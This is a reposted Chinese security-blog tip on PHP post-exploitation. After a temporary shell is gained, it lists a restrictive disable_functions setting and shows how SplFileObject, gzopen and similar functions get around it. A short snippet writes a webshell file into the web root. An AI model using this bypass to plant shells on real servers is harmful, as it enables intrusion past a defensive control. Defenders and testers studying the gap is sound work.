PHP

php渗透测试技巧-文件操作

字号+ 作者:secoff 来源:转载 2017-03-15 09:35 我要评论( )

有些时候通过文件包含漏洞或其他漏洞拿到一个临时shell之后却发现服务器对disable_functions做了比较变态的设置。使得我们没法将shell或local exp写到其他目录。 ......

有些时候通过文件包含漏洞或其他漏洞拿到一个临时shell之后却发现服务器对disable_functions做了比较变态的设置。使得我们没法将shell或local exp写到其他目录。

1
2
3
4
5
6
#print_r(ini_get('disable_functions'));
putenv,chdir,dl,shell_exec,exec,system,passthru,popen,fopen,
fputs,mkdir,rmdir,rename,move_uploaded_file,unlink,copy,chgrp,
chown,lchgrp,lchown,chmod,touch,symlink,link,apache_request_headers,
highlight_file,show_source,highlight_string,parse_ini_file,mail,tempnam,
tmpfile,file_put_contents,error_log,proc_open,stream_socket_server,phpinfo,phpversion

如上所示服务器禁止了写文件操作和命令执行等函数, 但利用php的一些特性均可以实现类似的功能。首先我想到可以使用的函数是gzopen, imagejpeg, session_save_path等, 对于写webshell来说基本够用了,但如果写一个local exp的话里面会参杂一些我不想要的数据, 好在PHP 5起多了一个SplFileObject的文件操作类,由于SplFileObject使用的人较少所以服务器的安全设置一般会漏掉。

1
2
3
4
5
6
<?php
	$file = new SplFileObject("/var/www/html/hispy/b4dboy.php", "w");
	$written = $file->fwrite('shellcode');
	echo "Wrote $written bytes to file";
	#print_r(glob('/var/www/html/hispy/*'));
?>

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Php/617.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • php渗透测试技巧-本地文件包含

    php渗透测试技巧-本地文件包含

    2017-03-15 09:35

网友点评
暂时未开启评论功能~